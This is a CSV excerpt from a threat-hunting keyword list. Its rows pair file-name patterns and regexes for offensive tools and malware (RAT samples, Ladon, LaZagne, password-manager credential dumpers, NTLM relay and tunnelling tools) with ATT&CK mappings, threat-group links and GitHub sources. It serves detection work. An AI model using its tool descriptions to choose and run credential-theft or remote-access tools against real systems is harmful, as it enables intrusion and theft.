"*\kuhl_m_sekurlsa.c*",".{0,1000}\\kuhl_m_sekurlsa\.c.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","16186"
"*\Kula RAT Beta.exe*",".{0,1000}\\Kula\sRAT\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16187"
"*\Kurd Rat v1.0 Beta.exe*",".{0,1000}\\Kurd\sRat\sv1\.0\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16188"
"*\KYMS-RAT v 2.*.exe*",".{0,1000}\\KYMS\-RAT\sv\s2\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16189"
"*\L6-Rat Beta 1.exe*",".{0,1000}\\L6\-Rat\sBeta\s1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16190"
"*\l6-Rat crypter.exe*",".{0,1000}\\l6\-Rat\scrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16191"
"*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16192"
"*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","16193"
"*\Ladon.ps1*",".{0,1000}\\Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","16194"
"*\Ladon1.exe*",".{0,1000}\\Ladon1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16195"
"*\LaLa-Rat.exe*",".{0,1000}\\LaLa\-Rat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16196"
"*\lambdaenum.py*",".{0,1000}\\lambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","16197"
"*\LaMe RAT v1.0.exe*",".{0,1000}\\LaMe\sRAT\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16198"
"*\laps.py*",".{0,1000}\\laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16202"
"*\LAPSDumper\*",".{0,1000}\\LAPSDumper\\.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","16203"
"*\LAPSToolkit.ps1*",".{0,1000}\\LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16204"
"*\LAPSToolkit.ps1*",".{0,1000}\\LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16205"
"*\LastenLoader.exe*",".{0,1000}\\LastenLoader\.exe.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","16206"
"*\lastpass\getCredslastpassEntries.h*",".{0,1000}\\lastpass\\getCredslastpassEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16207"
"*\lastpass\getCredslastpassMasterPass.h*",".{0,1000}\\lastpass\\getCredslastpassMasterPass\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16208"
"*\lastpass\getCredslastpassMasterUsername.h*",".{0,1000}\\lastpass\\getCredslastpassMasterUsername\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16209"
"*\Lateral movement.cna*",".{0,1000}\\Lateral\smovement\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16210"
"*\lateral_wmi.py*",".{0,1000}\\lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16211"
"*\LatLoader.py*",".{0,1000}\\LatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","16212"
"*\LatLoader-main*",".{0,1000}\\LatLoader\-main.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","16213"
"*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16214"
"*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16215"
"*\LaZagne.py*",".{0,1000}\\LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16216"
"*\lazagne.zip*",".{0,1000}\\lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16217"
"*\ldap_search_bof.py*",".{0,1000}\\ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","16218"
"*\ldap_shell.cmd*",".{0,1000}\\ldap_shell\.cmd.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","16219"
"*\ldap-checker.py*",".{0,1000}\\ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16220"
"*\LDAP-Clear-Text-Password-*.txt*",".{0,1000}\\LDAP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16221"
"*\LDAP-NTLMv1-Client-*.txt*",".{0,1000}\\LDAP\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16222"
"*\ldapper.py*",".{0,1000}\\ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","16223"
"*\LDAPPER-master*",".{0,1000}\\LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","16224"
"*\ldapph.db*",".{0,1000}\\ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","16225"
"*\ldap-search.py*",".{0,1000}\\ldap\-search\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16226"
"*\ldapsearch-ad.py*",".{0,1000}\\ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16227"
"*\LdrLockLiberator.c*",".{0,1000}\\LdrLockLiberator\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","16228"
"*\LdrLockLiberatorWDK.c*",".{0,1000}\\LdrLockLiberatorWDK\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","16229"
"*\letmein.ps1*",".{0,1000}\\letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16230"
"*\lfs_injection.exe*",".{0,1000}\\lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16235"
"*\liblsarelay.dll*",".{0,1000}\\liblsarelay\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16236"
"*\liblsarelayx.dll*",".{0,1000}\\liblsarelayx\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16237"
"*\LibSnaffle*",".{0,1000}\\LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","16239"
"*\ligolo_agent.exe*",".{0,1000}\\ligolo_agent\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","16241"
"*\ligolo-proxy*",".{0,1000}\\ligolo\-proxy.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","16242"
"*\lilith.txt*",".{0,1000}\\lilith\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16243"
"*\Lime-Crypter.sln*",".{0,1000}\\Lime\-Crypter\.sln.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","16244"
"*\Lime-Crypter\*",".{0,1000}\\Lime\-Crypter\\.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","16245"
"*\Lime-RAT-*.zip*",".{0,1000}\\Lime\-RAT\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16246"
